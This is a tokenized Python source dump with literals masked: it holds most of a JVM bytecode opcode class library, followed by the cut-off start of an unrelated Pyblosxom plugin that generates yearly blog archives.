( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class INVOKESTATIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKESTATIC , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . klass . name , self . method . name_and_type . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return len ( self . method . descriptor . parameters ) <EOL> class INVOKEVIRTUAL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKEVIRTUAL , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . klass . name , self . method . name_and_type . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class IOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IOR , self ) . __init__ ( ) <EOL> class IREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISHL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISHL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class ISHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISHR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class ISTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ISTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISTORE_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ISUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ISUB , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IUSHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IUSHR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IXOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IXOR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class JSR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( JSR , self ) . __init__ ( ) <EOL> class JSR_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( JSR_W , self ) . __init__ ( ) <EOL> class L2D ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( L2D , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class L2F ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( L2F , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class L2I ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( L2I , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class LADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LAND ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LAND , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class LCMP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LCMP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LCONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LCONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LCONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LCONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( LDC , self ) . __init__ ( ) <EOL> if isinstance ( const , str ) : <EOL> self . const = String ( const ) <EOL> elif isinstance ( const , int ) : <EOL> self . const = Integer ( const ) <EOL> elif isinstance ( const , Constant ) : <EOL> self . const = const <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % type ( const ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u1 ( ) <EOL> return cls ( reader . constant_pool [ const ] ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( writer . constant_pool . index ( self . const ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . const . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDC_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( LDC_W , self ) . __init__ ( ) <EOL> if isinstance ( const , str ) : <EOL> self . const = String ( const ) <EOL> elif isinstance ( const , int ) : <EOL> self . const = Integer ( const ) <EOL> elif isinstance ( const , float ) : <EOL> self . const = Float ( const ) <EOL> elif isinstance ( const , Constant ) : <EOL> self . const = const <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % type ( const ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u2 ( ) <EOL> return cls ( reader . constant_pool [ const ] ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . const ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . const . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDC2_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( LDC2_W , self ) . __init__ ( ) <EOL> if isinstance ( const , float ) : <EOL> self . const = Double ( const ) <EOL> elif isinstance ( const , int ) : <EOL> self . const = Long ( const ) <EOL> elif isinstance ( const , Constant ) : <EOL> self . const = const <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % type ( const ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u2 ( ) <EOL> return cls ( reader . constant_pool [ const ] ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . const ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . const . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LLOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( LLOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LLOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LLOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class LMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LNEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LNEG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class LOOKUPSWITCH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LOOKUPSWITCH , self ) . __init__ ( ) <EOL> class LOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LOR , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class LRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class LSHL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSHL , self ) . __init__ ( ) <EOL> class LSHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSHR , self ) . __init__ ( ) <EOL> class LSTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE , self ) . __init__ ( ) <EOL> class LSTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_0 , self ) . __init__ ( ) <EOL> class LSTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_1 , self ) . __init__ ( ) <EOL> class LSTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_2 , self ) . __init__ ( ) <EOL> class LSTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSTORE_3 , self ) . __init__ ( ) <EOL> class LSUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LSUB , self ) . __init__ ( ) <EOL> class LUSHR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LUSHR , self ) . __init__ ( ) <EOL> class LXOR ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( LXOR , self ) . __init__ ( ) <EOL> class MONITORENTER ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( MONITORENTER , self ) . __init__ ( ) <EOL> class MONITOREXIT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( MONITOREXIT , self ) . __init__ ( ) <EOL> class MULTIANEWARRAY ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( MULTIANEWARRAY , self ) . __init__ ( ) <EOL> class NEW ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( NEW , self ) . __init__ ( ) <EOL> self . classref = Classref ( class_name ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . classref . name <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> classref = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> classref . name . bytes . decode ( '<STR_LIT>' ) , <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . classref ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . classref . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class NEWARRAY ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( NEWARRAY , self ) . __init__ ( ) <EOL> class NOP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( NOP , self ) . __init__ ( ) <EOL> class POP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( POP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class POP2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( POP2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class PUTFIELD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( PUTFIELD , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . klass . name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class PUTSTATIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( PUTSTATIC , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . klass . name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class RET ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( RET , self ) . __init__ ( ) <EOL> class RETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( RETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class SALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( SALOAD , self ) . __init__ ( ) <EOL> class SASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( SASTORE , self ) . __init__ ( ) <EOL> class SIPUSH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( SIPUSH , self ) . __init__ ( ) <EOL> self . const = const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . const <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_s2 ( ) <EOL> return cls ( const ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . const ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class SWAP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( SWAP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class TABLESWITCH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( TABLESWITCH , self ) . __init__ ( ) <EOL> class WIDE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( WIDE , self ) . __init__ ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __url__ = "<STR_LIT>" <EOL> __description__ = "<STR_LIT>" <EOL> __category__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __registrytags__ = "<STR_LIT>" <EOL> from Pyblosxom import tools , entries <EOL> from Pyblosxom . memcache import memcache_decorator <EOL> from Pyblosxom . tools import pwrap <EOL> import time <EOL> def verify_installation ( request ) : <EOL> config = request . get_configuration ( ) <EOL> if not '<STR_LIT>' in config : <EOL> pwrap ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return True <EOL> class YearArchives : <EOL> def __init__ ( self , request ) : <EOL> self . _request = request <EOL> self . _archives = None <EOL> self . _items = None <EOL> @ memcache_decorator ( '<STR_LIT>' , True ) <EOL> def __str__ ( self ) : <EOL> if self . _archives is None : <EOL> self . gen_linear_archive ( ) <EOL> return self . _archives <EOL> def gen_linear_archive ( self ) : <EOL> config = self . _request . get_configuration ( ) <EOL> data = self . _request . get_data ( ) <EOL> root = config [ "<STR_LIT>" ] <EOL> archives = { } <EOL> archive_list = tools . walk ( self . _request , root ) <EOL> items = [ ] <EOL> fulldict = { } <EOL> fulldict . update ( config ) <EOL> fulldict . update ( data ) <EOL> flavour = data . get ( <EOL> "<STR_LIT>" , config . get ( "<STR_LIT>" , "<STR_LIT:html>" ) ) <EOL> template = config . get ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> for mem in archive_list : <EOL> timetuple = tools . filestat ( self . _request , mem ) <EOL> timedict = { } <EOL> for x in [ "<STR_LIT:m>" , "<STR_LIT:Y>" , "<STR_LIT:y>" , "<STR_LIT:d>" ] : <EOL> timedict [ x ] = time . strftime ( "<STR_LIT:%>" + x , timetuple ) <EOL> fulldict . update ( timedict ) <EOL> fulldict [ "<STR_LIT:f>" ] = flavour <EOL> year = fulldict [ "<STR_LIT:Y>" ] <EOL> if not year in archives : <EOL> archives [ year ] = template % fulldict <EOL> items . append ( <EOL> [ "<STR_LIT>" % fulldict , <EOL> "<STR_LIT>" % fulldict , <EOL> time . mktime ( timetuple ) , <EOL> mem ] ) <EOL> arc_keys = archives . keys ( ) <EOL> arc_keys . sort ( ) <EOL> arc_keys . reverse ( ) <EOL> result = [ ] <EOL> for key in arc_keys : <EOL> result . append ( archives [ key ] ) <EOL> self . _archives = '<STR_LIT:\n>' . join ( result ) <EOL> self . _items = items <EOL> def new_entry ( request , yearmonth , body ) : <EOL> """<STR_LIT>""" <EOL> entry = entries . base . EntryBase ( request ) <EOL> entry [ '<STR_LIT:title>' ] = yearmonth <EOL> entry [ '<STR_LIT:filename>' ] = yearmonth + "<STR_LIT>" <EOL> entry [ '<STR_LIT>' ] = yearmonth <EOL> entry . _id = yearmonth + "<STR_LIT>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT:yes>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> entry [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> entry . set_time ( time . strptime ( yearmonth , "<STR_LIT>" ) ) <EOL> entry . set_data ( body ) <EOL> return entry <EOL> INIT_KEY = "<STR_LIT>" <EOL> def cb_prepare ( args ) : <EOL> request = args [ "<STR_LIT>" ] <EOL> data = request . get_data ( ) <EOL> data [ "<STR_LIT>" ] = 